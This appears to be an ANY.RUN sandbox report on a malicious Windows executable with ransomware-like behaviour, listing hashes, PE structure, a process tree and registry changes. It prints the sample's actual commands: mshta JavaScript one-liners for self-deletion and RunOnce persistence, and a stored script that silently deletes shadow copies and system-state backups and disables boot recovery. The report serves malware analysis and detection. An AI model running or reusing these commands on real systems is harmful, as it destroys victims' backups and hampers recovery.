analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe

Full analysis: https://app.any.run/tasks/af07f978-f89b-4964-a527-96bf9d15cd6d
Verdict: Malicious activity
Analysis date: August 25, 2019, 11:19:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

5A1437BC040EBABB2B588200831F5981

SHA1:

2A8F61F198E3B284A0AF08C4BA5C12DABB45B3D5

SHA256:

9398FA0504FE463EC758D5CA129C7C9000720EF7199170F3DDC1FC720A8B750C

SSDEEP:

12288:2dHNEiX63EXCWfWjR5r+sY5WFlk0noLUnA0CCnRhWy64EdI7+5sw:K3XVWjRR+sSWFlk0o4nA0CCi+EdI7+5Z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 3672)
      • cmd.exe (PID: 3892)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 2216)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 3532)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 3504)
    • Starts CMD.EXE for commands execution

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3528)
      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3160)
      • mshta.exe (PID: 3860)
    • Application launched itself

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3528)
    • Creates files in the user directory

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 3504)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3160)
      • osk.exe (PID: 2408)
    • Starts itself from another location

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3160)
    • Executed as Windows Service

      • vssvc.exe (PID: 3576)
    • Creates files in the program directory

      • osk.exe (PID: 2408)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3532)
      • mshta.exe (PID: 3860)
      • mshta.exe (PID: 976)
    • Dropped object may contain Bitcoin addresses

      • osk.exe (PID: 2408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

ProductVersion: 1.5.78.3
ProductName: CraftedButtons
FileVersion: 1.5.78.3
CompanyName: Vaidrius Petrauskas
PrivateBuild: 1.5.78.3
InternalName: CraftedButtons
FileDescription: 4d75 Erie Assure Serving Telling
LegalCopyright: Copyright CVaidrius Petrauskas 1999 - 2014
OriginalFileName: CraftedButtons
LegalTrademarks: Copyright ©Vaidrius Petrauskas 1999 - 2014
CharacterSet: Windows, Latin1
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Windows NT 32-bit
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.5.78.3
FileVersionNumber: 1.5.78.3
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x40409
UninitializedDataSize: -
InitializedDataSize: 299008
CodeSize: 380928
LinkerVersion: 8
PEType: PE32
TimeStamp: 2018:08:16 06:22:45+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 16-Aug-2018 04:22:45
Detected languages:
  • English - United States
LegalTrademarks: Copyright ©Vaidrius Petrauskas 1999 - 2014
OriginalFilename: CraftedButtons
LegalCopyright: Copyright CVaidrius Petrauskas 1999 - 2014
FileDescription: 4d75 Erie Assure Serving Telling
InternalName: CraftedButtons
PrivateBuild: 1.5.78.3
CompanyName: Vaidrius Petrauskas
FileVersion: 1.5.78.3
ProductName: CraftedButtons
ProductVersion: 1.5.78.3

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000E8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 4
Time date stamp: 16-Aug-2018 04:22:45
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0005C16D
0x0005D000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.65682
.rdata
0x0005E000
0x000173AC
0x00018000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.08361
.data
0x00076000
0x00006F38
0x00004000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.77449
.rsrc
0x0007D000
0x0002C424
0x0002D000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.32676

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.89256
741
Latin 1 / Western European
English - United States
RT_MANIFEST
2
3.55521
11432
Latin 1 / Western European
English - United States
RT_ICON
3
3.91018
7112
Latin 1 / Western European
English - United States
RT_ICON
4
4.0792
5672
Latin 1 / Western European
English - United States
RT_ICON
5
4.52127
3752
Latin 1 / Western European
English - United States
RT_ICON
6
5.09803
2440
Latin 1 / Western European
English - United States
RT_ICON
7
5.12993
1128
Latin 1 / Western European
English - United States
RT_ICON
101
3.16468
104
Latin 1 / Western European
English - United States
RT_GROUP_ICON
2512
7.7706
1048
Latin 1 / Western European
English - United States
UNKNOWN
3342
7.99587
53326
Latin 1 / Western European
English - United States
RCDATA

Imports

ADVAPI32.dll
AVIFIL32.dll
COMCTL32.dll
CRYPT32.dll
GDI32.dll
KERNEL32.dll
NETAPI32.dll
OLEACC.dll (delay-loaded)
OLEAUT32.dll
SHELL32.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
19
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe no specs cmd.exe 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe cmd.exe osk.exe no specs mshta.exe no specs mshta.exe mshta.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wbadmin.exe no specs wmic.exe no specs vssadmin.exe no specs bcdedit.exe no specs bcdedit.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3528"C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3896"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3160"C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" runasC:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
3504"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2408"C:\Users\admin\AppData\Roaming\osk.exe" C:\Users\admin\AppData\Roaming\osk.exe9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Integrity Level:
HIGH
976mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe');close()}catch(e){}},10);"C:\Windows\system32\mshta.exe9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3532mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\MqDuTX',i);}catch(e){}},10);"C:\Windows\system32\mshta.exe
osk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3860mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\NVBSL\\PMUWG'));close();"C:\Windows\system32\mshta.exeosk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3464"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3672"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETEC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
2147749890
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
6 251
Read events
956
Write events
5 294
Delete events
1

Modification events

(PID) Process:(3528) 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3528) 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3160) 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3160) 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(976) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(976) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2408) osk.exeKey:HKEY_CURRENT_USER\Software\NVBSL
Operation:writeName:PMUWG
Value:
o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
(PID) Process:(3860) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3860) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3532) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
3 062
Text files
1 159
Unknown types
139

Dropped files

PID
Process
Filename
Type
35289398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeC:\Users\admin\AppData\Local\Temp\12460896
MD5:
SHA256:
31609398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeC:\Users\admin\AppData\Local\Temp\10023520
MD5:
SHA256:
2408osk.exeC:\Users\admin\AppData\Local\Temp\5788832
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\я
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Benioku.htm
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Berime.htm
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\IrakHau.htm
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leame.htm
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\LeesMij.htm
MD5:
SHA256:
2408osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leggimi.htm
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info